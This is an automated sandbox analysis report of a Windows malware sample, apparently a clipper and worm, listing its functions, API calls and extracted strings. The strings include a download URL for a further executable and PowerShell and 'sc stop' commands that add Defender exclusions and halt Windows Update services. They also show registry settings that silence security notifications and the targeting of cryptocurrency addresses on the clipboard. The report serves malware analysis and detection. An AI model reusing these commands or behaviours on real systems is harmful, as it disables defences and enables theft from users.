Associated: 00000004.00000002.1497825469.0000000000AF2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1497858842.0000000000AF4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_70AF.jbxd

Similarity

API ID: Internet$File$Open$Sleep$CloseEnvironmentExpandHandleReadStringsrandwsprintf$CountCreateExistsPathTickWritesrand
String ID: http://twizt.net/newtpp.exe
API String ID: 3094868945-3495472230
Opcode ID: 1d57d330c24637d5067817134763c2312e4faedb4a4555d4831aeb81a84676ed
Instruction ID: ae65e18dc2a4538e74287828c6dfa61ab7574368e57c307066cb9f78ce8e762a
Opcode Fuzzy Hash: 1d57d330c24637d5067817134763c2312e4faedb4a4555d4831aeb81a84676ed
Instruction Fuzzy Hash: 75C08CA2A0010DC6854073F01B0F77A21104F00799F080922F7059ACC3EE439405D6A3

Analysis Process: 1706633239.exePID: 7568, Parent PID: 7504COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.3%
Total number of Nodes:	1501
Total number of Limit Nodes:	8

Executed Functions

Function 0040F1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
strcmp.NTDLL ref: 0040F1D2

Strings

UKR, xrefs: 0040F1C9

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: InfoLocalestrcmp
String ID: UKR
API String ID: 3191669094-64918367
Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA

Function 00407940 Relevance: 282.5, APIs: 103, Strings: 58, Instructions: 749
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 0040794E
CreateMutexA.KERNELBASE(00000000,00000000,mmn7nnm8na), ref: 0040795D
GetLastError.KERNEL32 ref: 00407969
ExitProcess.KERNEL32 ref: 00407978
GetModuleFileNameW.KERNEL32(00000000,004161D0,00000105), ref: 004079B2
PathFindFileNameW.SHLWAPI(004161D0), ref: 004079BD
wsprintfW.USER32 ref: 004079DA
DeleteFileW.KERNELBASE(?), ref: 004079EA
ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
wcscmp.NTDLL ref: 00407A13
ExitProcess.KERNEL32 ref: 00407A32

Strings

SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator, xrefs: 0040802D
AntiVirusOverride, xrefs: 00408174
SYSTEM\CurrentControlSet\Services\BITS, xrefs: 00407EE4
UpdatesDisableNotify, xrefs: 004081D1
AutoUpdateOptions, xrefs: 0040807C
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU, xrefs: 00407F96
%s\%s, xrefs: 00407B4D
SYSTEM\CurrentControlSet\Services\UsoSvc, xrefs: 00407D80
AntiVirusDisableNotify, xrefs: 00408193
SOFTWARE\Microsoft\Security Center\Svc, xrefs: 004081FE
cmd.exe, xrefs: 00407D45
cmd.exe, xrefs: 00407D60
DisableWindowsUpdate, xrefs: 0040805D
UpdatesOverride, xrefs: 004081B2
Start, xrefs: 00407EB7
FirewallDisableNotify, xrefs: 0040824D
AntiSpywareOverride, xrefs: 0040826C
AntiVirusDisableNotify, xrefs: 004082AA
SYSTEM\CurrentControlSet\Services\DoSvc, xrefs: 00407E8B
FirewallOverride, xrefs: 00408117
SYSTEM\CurrentControlSet\Services\WaaSMedicSvc, xrefs: 00407DD9
%s\tbtnds.dat, xrefs: 0040833B
AntiVirusOverride, xrefs: 0040828B
%s\tbtcmds.dat, xrefs: 00408355
sysppvrdnvs.exe, xrefs: 00407A07, 00407A4F, 00407B41, 00407C4A
SOFTWARE\Microsoft\Security Center, xrefs: 004080E7
OverrideNotice, xrefs: 00408000
PreventDownload, xrefs: 004080BA
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate, xrefs: 00407F3D
Start, xrefs: 00407DAC
DisableWindowsUpdate, xrefs: 00407F69
NoAutoUpdate, xrefs: 00407FC2
%windir%, xrefs: 00407A44
UpdatesOverride, xrefs: 004082C9
%s:Zone.Identifier, xrefs: 004079CE
FirewallOverride, xrefs: 0040822E
mmn7nnm8na, xrefs: 00407954
%s\%s, xrefs: 00407A5B
FirewallDisableNotify, xrefs: 00408136
AlwaysAutoUpdate, xrefs: 00407FE1
%temp%, xrefs: 00407C3F
%userprofile%, xrefs: 004079FC
Start, xrefs: 00407E05
Start, xrefs: 00407E5E
open, xrefs: 00407D65
EnableWindowsUpdate, xrefs: 0040809B
Windows Settings, xrefs: 00407AE7, 00407BD9, 00407CE2
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407CA4
/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -, xrefs: 00407D40
SYSTEM\CurrentControlSet\Services\wuauserv, xrefs: 00407E32
Start, xrefs: 00407F10
AntiSpywareOverride, xrefs: 00408155
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407B9B
/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, xrefs: 00407D5B
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407AA9
open, xrefs: 00407D4A
UpdatesDisableNotify, xrefs: 004082E8
%s\%s, xrefs: 00407C56

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
API String ID: 4172876685-159212852
Opcode ID: 14d5bbea81be467e13e3765130848305c9d0a11b32ad18c98a91a2c8bc0bfa95
Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
Opcode Fuzzy Hash: 14d5bbea81be467e13e3765130848305c9d0a11b32ad18c98a91a2c8bc0bfa95
Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C

Function 0040F400 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040F40E
memset.NTDLL ref: 0040F41E
CreateProcessW.KERNELBASE(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
Sleep.KERNELBASE(000003E8), ref: 0040F467
ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
Sleep.KERNEL32(000003E8), ref: 0040F49C

Strings

D, xrefs: 0040F426
open, xrefs: 0040F47B
, xrefs: 0040F491

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 3787208655-2182757814
Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759

Non-executed Functions

Function 004068E0 Relevance: 105.4, APIs: 47, Strings: 13, Instructions: 407
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_chkstk.NTDLL(?,004070E0,?,?,?), ref: 004068E8
wsprintfW.USER32 ref: 0040691F
wsprintfW.USER32 ref: 0040693F
wsprintfW.USER32 ref: 0040695F
wsprintfW.USER32 ref: 0040697F
wsprintfW.USER32 ref: 00406998
wsprintfW.USER32 ref: 004069B8
PathFileExistsW.SHLWAPI(?), ref: 004069C8
SetFileAttributesW.KERNEL32(?,00000080), ref: 00406A01
DeleteFileW.KERNEL32(?), ref: 00406A0E
PathFileExistsW.SHLWAPI(?), ref: 00406A1B
PathFileExistsW.SHLWAPI(?), ref: 00406A30
SetFileAttributesW.KERNEL32(?,00000080), ref: 00406A46
DeleteFileW.KERNEL32(?), ref: 00406A53
PathFileExistsW.SHLWAPI(?), ref: 00406A60
CreateDirectoryW.KERNEL32(?,00000000), ref: 00406A73

Strings

shell32.dll, xrefs: 00406BFC
%s\*, xrefs: 0040698C
%s\%s\%s, xrefs: 00406EE7
%s\%s, xrefs: 00406933
shell32.dll, xrefs: 00406C52
shell32.dll, xrefs: 00406C16
%s\%s, xrefs: 00406E4D
%s\%s, xrefs: 00406973
%s\%s\rvldrv.exe, xrefs: 004069AC
%s\%s, xrefs: 00406EC0
%s.lnk, xrefs: 00406913
shell32.dll, xrefs: 00406C38
%s\%s\rvlcfg.exe, xrefs: 00406953

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$shell32.dll$shell32.dll$shell32.dll$shell32.dll
API String ID: 495142193-638321828
Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69

Function 00404970 Relevance: 71.0, APIs: 24, Strings: 16, Instructions: 989clipboardstringmemoryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 0040498C
StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D99
StrStrW.SHLWAPI(00000000,cosmos), ref: 00404DC4
StrStrW.SHLWAPI(00000000,addr), ref: 00404DEF
StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404E8A
StrStrW.SHLWAPI(00000000,ronin:), ref: 00404EA1
StrStrW.SHLWAPI(00000000,nano_), ref: 00404EB8
StrStrW.SHLWAPI(00000000,bnb), ref: 00405458
StrStrW.SHLWAPI(00000000,bc1p), ref: 00405474
StrStrW.SHLWAPI(00000000,bc1q), ref: 00405490
StrStrW.SHLWAPI(00000000,ronin:), ref: 004054B3
StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 004054CD
StrStrW.SHLWAPI(00000000,cosmos), ref: 004054E7
StrStrW.SHLWAPI(00000000,addr), ref: 00405501
StrStrW.SHLWAPI(00000000,nano_), ref: 0040551B
lstrlenA.KERNEL32(00000000), ref: 004055F0
GlobalAlloc.KERNEL32(00002002,-00000001), ref: 0040560B
GlobalLock.KERNEL32(00000000), ref: 0040561E
memcpy.NTDLL(00000000,00000000,-00000001), ref: 0040563C
GlobalUnlock.KERNEL32(00000000), ref: 00405648
OpenClipboard.USER32(00000000), ref: 00405650
EmptyClipboard.USER32 ref: 0040565A
SetClipboardData.USER32(00000001,00000000), ref: 00405666
CloseClipboard.USER32 ref: 0040566C

Strings

bc1q, xrefs: 00405487
cosmos, xrefs: 00404DBB
cosmos, xrefs: 004054DE
nano_, xrefs: 00405512
bitcoincash:, xrefs: 004054C4
nano_, xrefs: 00404EAF
bc1p, xrefs: 0040546B
8, xrefs: 00405546
addr, xrefs: 004054F8
hA, xrefs: 004054A3
ronin:, xrefs: 004054AA
ronin:, xrefs: 00404E98
bitcoincash:, xrefs: 00404D90
bnb, xrefs: 0040544F
bitcoincash:, xrefs: 00404E81
addr, xrefs: 00404DE6

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockmemcpy
String ID: 8$addr$addr$bc1p$bc1q$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$hA$nano_$nano_$ronin:$ronin:
API String ID: 2017104846-250561147
Opcode ID: 25dea65d1d4449a2ef1eae01c065bfd0f7a4c4a1741e3957523323aa1ae31655
Instruction ID: 6e0617124f46e3e1bef08e4e409f6ed46b9961a6860853f8336ff2275e542cf2
Opcode Fuzzy Hash: 25dea65d1d4449a2ef1eae01c065bfd0f7a4c4a1741e3957523323aa1ae31655
Instruction Fuzzy Hash: 609237B0A04218EACF58CF41C0945BE7BB2AF82751F60C06BE9456F294C77D8EC1DB99

Function 004059B0 Relevance: 25.7, APIs: 17, Instructions: 186
clipboardregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004059BC
SetClipboardViewer.USER32(?), ref: 00405A08
SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
OpenClipboard.USER32(00000000), ref: 00405AB7
GetClipboardData.USER32(00000000), ref: 00405AC9
RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
ChangeClipboardChain.USER32(?,?), ref: 00405BDE
DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
String ID:
API String ID: 3549449529-0
Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69

Function 004067A0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
wsprintfW.USER32 ref: 004067C5
FindFirstFileW.KERNEL32(?,?), ref: 004067DC
lstrcmpW.KERNEL32(?,00411368), ref: 00406801
lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
wsprintfW.USER32 ref: 0040683A
wsprintfW.USER32 ref: 0040685A
MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
FindClose.KERNEL32(000000FF), ref: 004068BF
RemoveDirectoryW.KERNEL32(?), ref: 004068C9

Strings

%s\%s, xrefs: 0040684E
%s\*, xrefs: 004067B9
%s\%s, xrefs: 0040682E

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*
API String ID: 92872011-445461498
Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98

Function 00406F70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 00406F7E
GetModuleFileNameW.KERNEL32(00000000,00415DB8,00000104), ref: 00406F90

Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232

ExitThread.KERNEL32 ref: 004070FA

Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
Part of subcall function 004063E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
Part of subcall function 004063E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E

Sleep.KERNEL32(000007D0), ref: 004070ED

Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
_aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
wsprintfW.USER32 ref: 00407072
wsprintfW.USER32 ref: 00407092
wsprintfW.USER32 ref: 004070B5

Strings

%s%s, xrefs: 004070A9
Unnamed volume, xrefs: 00407086
(%dGB), xrefs: 00407066

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
String ID: (%dGB)$%s%s$Unnamed volume
API String ID: 1650488544-2117135753
Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A

Function 0040E190 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
htons.WS2_32(0000076C), ref: 0040E1E0
inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D

Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8

bind.WS2_32(000000FF,?,00000010), ref: 0040E243
lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285

Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE

Strings

239.255.255.250, xrefs: 0040E1EA
X#A, xrefs: 0040E258, 0040E25B

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
String ID: 239.255.255.250$X#A
API String ID: 726339449-2206458040
Opcode ID: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
Opcode Fuzzy Hash: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59

Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?), ref: 00402043
InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E

Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE

WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
setsockopt.WS2_32 ref: 004020D1
htons.WS2_32(?), ref: 00402101
bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
listen.WS2_32(?,7FFFFFFF), ref: 0040212F
WSACreateEvent.WS2_32 ref: 0040213A
WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E

Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
String ID:
API String ID: 1603358586-0
Opcode ID: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
Opcode Fuzzy Hash: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A

Function 00406660 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040666B
CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
wsprintfW.USER32 ref: 004066C4
wsprintfW.USER32 ref: 004066E5

Strings

cl@, xrefs: 004066A0
